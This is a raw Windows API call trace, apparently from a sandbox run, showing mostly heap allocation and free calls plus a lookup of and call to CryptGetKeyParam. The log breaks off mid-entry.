1 [0178.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0178.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0178.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0178.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0178.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.009] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0178.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0178.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0178.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0178.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0178.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0178.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0178.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0178.010] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0178.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0178.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0178.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0178.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0178.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0178.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0178.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0178.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0178.010] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0178.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0178.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0178.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0178.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0178.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0178.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0178.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0178.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0178.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0178.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0178.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0178.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0178.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0178.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0178.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0178.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0178.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0178.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0178.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0178.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0178.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0178.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0178.014] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0178.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0178.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.015] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0178.015] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, 